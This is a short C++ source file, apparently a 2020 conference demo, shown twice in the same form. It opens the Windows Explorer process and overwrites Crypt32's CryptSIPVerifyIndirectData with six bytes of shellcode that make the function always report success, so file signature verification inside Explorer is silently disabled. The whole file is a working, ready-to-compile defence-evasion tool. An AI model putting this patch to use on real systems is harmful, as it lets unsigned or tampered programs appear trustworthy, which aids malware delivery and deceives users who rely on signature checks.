gavz/signBypass.cpp

## signBypass.cpp
// iThome 2020 Demo: Signature Patcher for Explorer
// author: aaaddress1@chroot.org
#include <iostream>
#include <Windows.h>

int main() {
	DWORD explorer_pid;
	GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", NULL), &explorer_pid);

	if (HANDLE token = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid)) {
		WriteProcessMemory(token, GetProcAddress(LoadLibraryA("Crypt32"), "CryptSIPVerifyIndirectData"), "\x48\x31\xC0\xFE\xC0\xC3", 6, NULL);
                std::cout << "[+] Explorer.exe Patch Done." << std::endl;
	}
	else {
		std::cout << "[!] Explorer.exe Alive yet?" << std::endl;
		getchar();
	}
}
	// iThome 2020 Demo: Signature Patcher for Explorer
	// author: aaaddress1@chroot.org
	#include <iostream>
	#include <Windows.h>

	int main() {
	DWORD explorer_pid;
	GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", NULL), &explorer_pid);

	if (HANDLE token = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid)) {
	WriteProcessMemory(token, GetProcAddress(LoadLibraryA("Crypt32"), "CryptSIPVerifyIndirectData"), "\x48\x31\xC0\xFE\xC0\xC3", 6, NULL);
	std::cout << "[+] Explorer.exe Patch Done." << std::endl;
	}
	else {
	std::cout << "[!] Explorer.exe Alive yet?" << std::endl;
	getchar();
	}
	}